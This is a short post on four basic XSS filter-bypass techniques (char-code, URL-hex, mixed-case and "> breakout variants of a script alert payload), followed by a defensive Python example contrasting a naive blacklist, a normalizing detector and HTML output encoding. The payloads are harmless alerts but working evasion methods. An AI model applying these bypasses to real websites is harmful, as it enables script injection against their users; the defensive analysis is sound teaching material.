Four very basic bypass methods.

1. Convert to ASCII codes
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, 108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>

2. Convert to HEX (hexadecimal)
Example: the original script is <script>alert(‘I love F4ck’)</script>
After conversion it becomes:
%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e

3. Change the case of the script
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: <ScRipt>AleRt(‘I love F4ck’)</sCRipT>

4. Add a closing marker ”>
Example: the original script is <script>alert(‘I love F4ck’)</script>
Converted to: ”><script>alert(‘I love F4ck’)</script>

For more detailed bypass techniques, see this page:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet

The conversion tool used is the HackBar Mozilla add-on for Firefox.
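The four tricks above all defeat the same kind of defence: a blacklist that looks for one literal string in the raw input. The added Python example below (written for this page, not code from the post, HackBar or OWASP) shows why. It runs a naive case-sensitive substring filter over the post's variants, then a normalizing check that URL-decodes until stable, expands `String.fromCharCode(...)`, and lowercases before matching, and finally shows that context-aware output encoding (`html.escape` with `quote=True`) neutralizes every variant, including the `">` attribute breakout of method 4, without any blacklist at all. The sample inputs are constructed from the post (quotes written straight here); the function names are my own.

```python
"""Why naive XSS blacklists miss encoded/case-changed payloads, and what works instead."""
import html
import re
import urllib.parse

# Constructed sample inputs based on the post's four variants plus a benign string.
SAMPLES = {
    "plain": "<script>alert('I love F4ck')</script>",
    "charcode": "<script>String.fromCharCode(97, 108, 101, 114, 116, 40, 8216, 73, 32, "
                "108, 111, 118, 101, 32, 70, 52, 99, 107, 8217, 41)</script>",
    "hex": "%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%2018%49%20%6c%6f%76%65%20"
           "%46%34%63%6b%2019%29%3c%2f%73%63%72%69%70%74%3e",
    "case": "<ScRipt>AleRt('I love F4ck')</sCRipT>",
    "closer": "\"><script>alert('I love F4ck')</script>",
    "benign": "I love F4ck",
}

BLACKLISTED = "<script>alert("


def naive_filter_allows(value: str) -> bool:
    """A case-sensitive literal blacklist: returns True when the input is let through.

    This is the kind of filter methods 1 to 3 are aimed at."""
    return BLACKLISTED not in value


def _expand_charcode(match: re.Match) -> str:
    """Replace String.fromCharCode(97, 108, ...) with the characters it would produce."""
    codes = [int(c) for c in re.findall(r"\d+", match.group(1))]
    return "".join(chr(c) for c in codes)


def normalize(value: str) -> str:
    """Canonicalize input before matching: decode, expand char codes, fold case.

    URL-decoding is repeated until the string stops changing so that
    double-encoded input (%253c -> %3c -> <) is also unwrapped."""
    previous = None
    while previous != value:
        previous = value
        value = urllib.parse.unquote(value)
    value = re.sub(r"string\.fromcharcode\s*\(([\d,\s]*)\)", _expand_charcode,
                   value, flags=re.IGNORECASE)
    return value.lower()


def looks_like_script(value: str) -> bool:
    """Detection over the normalized form: a <script tag in any spelling or encoding."""
    return re.search(r"<\s*script\b", normalize(value)) is not None


def render_safely(value: str) -> str:
    """The actual mitigation: encode on output for the HTML context the value lands in.

    quote=True also encodes " and ', so method 4's leading "> cannot close an attribute."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    print(f"{'variant':9} {'naive allows':13} {'normalized hit':15} rendered")
    for name, payload in SAMPLES.items():
        print(f"{name:9} {str(naive_filter_allows(payload)):13} "
              f"{str(looks_like_script(payload)):15} {render_safely(payload)}")
```

Run it and the table makes the point of the post from the other side: the naive filter stops only the plain payload, while normalization catches all five script variants and passes the benign string. Even so, the normalizer is a detection aid, not a fix; the OWASP sheet linked above lists far more encodings than this one handles, which is why the safe rendering path is what should be relied on.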